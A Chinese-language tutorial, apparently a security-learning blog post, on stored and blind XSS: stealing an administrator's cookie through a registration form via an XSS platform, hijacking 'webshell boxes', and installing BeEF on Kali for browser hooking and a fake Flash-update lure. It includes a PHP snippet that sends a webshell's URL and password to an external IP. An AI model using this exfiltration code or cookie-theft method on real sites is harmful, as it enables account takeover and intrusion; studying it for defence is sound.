WEB漏洞-XSS跨站之订单及Shell箱子反杀记

d9ea468fa46d5f5a3ed2bd1de99b37bd.png

XSS平台

xss盲打测试

搭建测试环境可能因为版本问题没有成功,改用自己的测试代码

在注册页面尝试xss注入,注册页面过滤不严格通常都可以尝试xss注入漏洞

QQ截图20220120091801.jpg

随便找个xss平台注册进行测试,实际上这个平台在github上有源码,也可以自己进行搭建

QQ截图20220120092841.jpg

获得注入语句后进行测试

QQ截图20220120092946.jpg

管理员账号进行登录时,发现了注入的脚本,再返回xss平台查看

QQ截图20220120093113.jpg

或得到了cookie,也可以利用该cookie在没有过期之前进入到该网站的后台

QQ截图20220120093216.jpg

webshell箱子反杀

既然有这样的xss平台,就会有利用平台的思路,在获得webshell的过程中,难免使用别人写好的工具,其中就会存在后门,把攻击成功的webshell信息汇总到一个服务器,这个东西就叫做webshell箱子,如果这个箱子过滤不严格,就会存在xss注入漏洞,利用这个漏洞就可以获得cookie,进入这个箱子

QQ截图20220120094524.jpg

大马存在发送webshell信息到盒子

QQ截图20220120094710.jpg

摸清这个规律后,如果链接参数过滤不严格,就可以构造xss语句进行攻击,先测试一次,摸清规律

// $_SERVER['HTTP_HOST']获取当前域名
// $_SERVER['PHP_SELF']当前PHP文件相对于网站根目录的位置地址
<?php
$password = 'admin';
$url = $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
echo "<script src='http://121.40.173.182/api.asp?url=$url&pass=$password&id=1'>";
?>

假设访问了上述代码为一个大马且存在向webshell发送信息,查看后台发现链接和密码显示在后台,利用该链接,进行注入

QQ截图20220120095310.jpg

xss箱子查看(发现新的PHP脚本入账,XSS一般盗取管理员密码(cookie)和管理员当前的浏览页面的地址),这类后门的后门,一般都会通过加密来掩饰地址,并且命名为:过狗,秒杀一切等等,一般在webshell后门下载等等。特点:会跳转到其它网站传递信息

  • 可以尝试在链接中注入xss,然后推送该信息到webshell箱子,然后获取管理员的cookie

QQ截图20220120095404.jpg

beef

使用的2021的kali没有beef需要自己安装,确保安装成功需要更换apt源,注释掉原来的源,推荐用aliyun的源

#vim /etc/apt/sources.list

# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
#deb http://http.kali.org/kali kali-rolling main contrib non-free

# Additional line for source packages
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

#中科大
#deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

安装beef-xss

apt-get install beef-xss -y

安装完成后需要修改默认的用户名和密码,否则会启动失败

QQ截图20220120101846.jpg

vi /etc/beef-xss/config.yaml修改配置文件找到用户名和密码全部修改

QQ截图20220120101954.jpg

systemctl start beef-xss启动beef,也可以使用beef-xss命令

QQ截图20220120102452.jpg

访问http://192.168.50.22:3000/ui/authentication

QQ截图20220120102134.jpg

尝试注入后查看beef后台

QQ截图20220120102654.jpg

QQ截图20220120102725.jpg

只要不关闭页面,就可以一直进行攻击

QQ截图20220120103028.jpg

模拟flash更新引导攻击

QQ截图20220120103559.jpg

QQ截图20220120103626.jpg

自行搭建xss平台

搭建xss平台需要1台外网服务器即可